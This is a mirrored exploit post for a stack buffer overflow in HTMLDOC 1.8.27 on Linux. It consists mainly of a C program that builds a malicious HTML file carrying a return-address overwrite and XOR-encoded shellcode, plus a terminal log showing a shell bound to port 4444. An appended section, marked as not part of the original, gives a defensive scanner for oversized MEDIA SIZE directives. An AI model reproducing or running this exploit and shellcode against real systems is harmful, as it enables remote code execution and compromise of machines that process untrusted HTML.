HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit
Source: http://www.pank4j.com  Author: Pankaj  Published: 2009-09-10

/*

HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
Reference: http://www.securityfocus.com/bid/35727

Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR)
Credit: ANTHRAX666 for finding the vulnerability

Coded by Pankaj Kohli
http://www.pank4j.com

pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
2
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
pankaj@zion:~/test/htmldoc$ ./htmldocb0f

[*] Creating buffer
[*] Exploit file written to sploit.html
Run as: htmldoc -f somefile.pdf sploit.html

pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
[1] 3287
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN

*/

#include <stdio.h>
#include <string.h>


/* Port binding (xor encoded) shellcode (port 4444) */
char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";

long jmp = 0x0804d938;  // push esp; ret 0x0807;  ;-)

int main(int argc, char **argv, char **envp) {
    char buff[512];
    int i;
    FILE *fd;

    printf("\n[*] Creating buffer\n");
    /* 19-byte HTMLDOC directive comment, then 275 bytes of filler up to the saved return address */
    strcpy(buff, "<!-- MEDIA SIZE 1x1");
    for(i=0; i<275; i++) {
        buff[19+i] = 'A';
    }

    /* Saved return address at offset 294, overwritten little-endian with the push esp; ret gadget */
    buff[294] = jmp & 0x000000ff;
    buff[295] = (jmp & 0x0000ff00) >> 8;
    buff[296] = (jmp & 0x00ff0000) >> 16;
    buff[297] = (jmp & 0xff000000) >> 24;
    buff[298] = 0;

    /* Shellcode is appended directly after the return address */
    strcat(buff, code);

    fd = fopen("sploit.html", "wb");
    if (fd == NULL) {
        perror("fopen");
        return 1;
    }
    fprintf(fd, "%s", buff);
    fclose(fd);
    printf("[*] Exploit file written to sploit.html\n");
    printf("Run as: htmldoc -f somefile.pdf sploit.html\n\n");

    return 0;
}
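From the defender's side, as an added example that is not part of Pankaj's exploit: a scanner that measures the argument of each `<!-- MEDIA SIZE` directive comment, the one the exploit pads with 275 bytes before the return address, and flags files whose argument is far longer than any real page size. The 64-byte threshold, the sample inputs and the function names are constructed here, not taken from HTMLDOC's source.

```c
#include <string.h>

/* Constructed threshold (not from HTMLDOC's source): real page sizes such as
 * "Letter" or "210x297mm" are a few bytes; the exploit needs 275 bytes of filler. */
#define MAX_SAFE_ARG 64

/* Length of the longest "<!-- MEDIA SIZE ..." argument in the buffer, or 0 if
 * none. An unterminated comment counts to the end of the buffer, which is how
 * much an unbounded copy in a parser would take. */
size_t longest_media_size_arg(const char *html, size_t len)
{
    static const char prefix[] = "<!-- MEDIA SIZE ";
    const size_t plen = sizeof(prefix) - 1;
    size_t longest = 0;
    for (size_t i = 0; i + plen <= len; i++) {
        if (memcmp(html + i, prefix, plen) != 0)
            continue;
        size_t start = i + plen, end = start;
        /* The argument ends at the closing "-->", a NUL, or the end of the buffer. */
        while (end < len && html[end] != '\0' &&
               !(end + 3 <= len && memcmp(html + end, "-->", 3) == 0))
            end++;
        size_t arglen = end - start;
        while (arglen > 0 && html[start + arglen - 1] == ' ')
            arglen--;                 /* ignore trailing blanks before "-->" */
        if (arglen > longest)
            longest = arglen;
        i = end;                      /* resume scanning after this directive */
    }
    return longest;
}

/* 1 if any MEDIA SIZE argument exceeds the threshold, else 0. */
int has_oversized_media_size(const char *html, size_t len)
{
    return longest_media_size_arg(html, len) > MAX_SAFE_ARG;
}

/* Constructed sample shaped like the exploit's output: the directive, `pad`
 * filler bytes and no closing "-->". Returns the longest argument found. */
size_t scan_padded_sample(size_t pad)
{
    char buf[1024];
    const char head[] = "<!-- MEDIA SIZE 1x1";
    if (pad > sizeof(buf) - sizeof(head))
        pad = sizeof(buf) - sizeof(head);
    memcpy(buf, head, sizeof(head) - 1);
    memset(buf + sizeof(head) - 1, 'A', pad);
    return longest_media_size_arg(buf, sizeof(head) - 1 + pad);
}
```

Call `has_oversized_media_size` on the raw bytes of an HTML file before handing it to HTMLDOC; `scan_padded_sample(275)` reproduces the shape of sploit.html (a 278-byte argument), while a benign `<!-- MEDIA SIZE Letter -->` measures 6.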


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved